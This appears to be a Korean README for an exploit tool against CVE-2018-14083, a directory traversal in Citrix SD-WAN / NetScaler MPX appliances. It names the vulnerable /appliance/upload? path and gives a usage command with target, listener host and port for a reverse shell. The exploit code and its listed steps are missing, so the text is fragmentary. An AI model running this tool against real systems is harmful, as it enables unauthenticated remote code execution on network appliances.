
CVE-2018-14083 — Citrix SD-WAN 4000-Series의 디렉터리 탐색 취약점.
이 취약점은 Citrix SD-WAN 4000-Series의 NetScaler MPX에서 발견되었습니다. 원격의 인증되지 않은 공격자가 이 취약점을 악용하여 임의의 파일을 다운로드하거나 루트 권한으로 임의의 코드를 실행할 수 있습니다.
/appliance/upload? (업로드 기능)
# pip install requests
$ python exploit.py --target https://192.168.1.1 --lhost 192.168.1.10 --lport 4444
Citrix SD-WAN 4000-Series는 애플리케이션 성능을 향상시키고 WAN 연결을 최적화하도록 설계된 네트워크 어플라이언스입니다. NetScaler MPX는 이 제품군의 일부입니다.
이 취약점은 /appliance/upload? 경로의 사용자 입력 검증 부족으로 인해 발생합니다. 인증되지 않은 공격자는 디렉터리 탐색 시퀀스를 사용하여 임의의 파일을 업로드하거나 다운로드할 수 있으며, 이를 통해 원격 코드 실행으로 이어질 수 있습니다.
이 익스플로잇은 다음 단계로 구성됩니다:
이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다. 작성자는 이 도구의 오용으로 인한 어떠한 손해에도 책임을 지지 않습니다.
MIT 라이선스